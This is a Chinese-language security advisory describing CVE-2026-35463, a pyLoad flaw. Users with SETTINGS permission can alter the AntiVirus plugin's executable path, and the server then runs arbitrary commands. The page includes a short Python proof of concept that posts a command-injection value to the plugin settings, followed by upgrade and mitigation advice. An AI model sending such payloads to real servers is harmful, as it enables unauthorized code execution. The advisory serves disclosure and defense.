CVE-2026-35463 CVSS 8.8 高危

CVE-2026-35463 pyLoad权限绕过致远程代码执行漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35463

漏洞类型

远程代码执行 (RCE)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

pyLoad

漏洞概述

pyLoad是一款开源的Python下载管理器。在0.5.0b3.dev96及更早版本中，存在一个严重的权限绕过漏洞。尽管系统对核心配置选项实施了ADMIN_ONLY_OPTIONS保护机制，但该机制未正确应用于插件配置。具有SETTINGS权限的非管理员用户可以利用AntiVirus插件中的配置漏洞，修改可执行文件路径参数，从而在服务器上执行任意代码，导致远程代码执行风险。

技术细节

该漏洞的核心原因在于pyLoad的安全控制机制存在设计缺陷。系统定义了ADMIN_ONLY_OPTIONS列表以保护敏感配置（如重连脚本、SSL证书），仅允许管理员修改。然而，该保护层未覆盖插件配置。AntiVirus插件将杀毒软件的执行路径（avfile）存储在配置中，并在运行时直接将其作为参数传递给subprocess.Popen()函数执行，未进行严格的权限验证或路径过滤。攻击者若拥有低权限的SETTINGS权限，即可篡改AntiVirus插件的avfile配置项，将其指向恶意系统命令。一旦插件功能被触发，服务器便会以应用权限执行该恶意命令，从而实现远程代码执行。

攻击链分析

STEP 1

1. 权限获取

攻击者获取一个pyLoad的低权限账户，该账户必须拥有SETTINGS权限。

STEP 2

2. 配置篡改

攻击者向服务器发送请求，修改AntiVirus插件的配置，将'avfile'参数的值修改为恶意系统命令（如反弹Shell脚本）。

STEP 3

3. 命令执行

当AntiVirus插件被触发执行（如下载扫描时），系统调用subprocess.Popen()加载篡改后的路径，从而在服务器端执行恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/api/settings/antivirus"

# Attacker's session cookie (requires SETTINGS permission)
cookies = {"session": "attacker_session_cookie"}

# Malicious payload: executing a simple command
data = {
    "avfile": "; touch /tmp/pwned.txt", # Example payload depending on OS context
    "enabled": "true"
}

# Send request to update plugin configuration
response = requests.post(url, json=data, cookies=cookies)

if response.status_code == 200:
    print("[+] Payload sent successfully. RCE triggered when plugin runs.")
else:
    print("[-] Failed to send payload.")

影响范围

pyLoad <= 0.5.0b3.dev96

防御指南

临时缓解措施

建议立即升级pyLoad至官方修复版本。若暂时无法升级，应撤销非管理员用户的SETTINGS权限或禁用AntiVirus插件以阻断攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表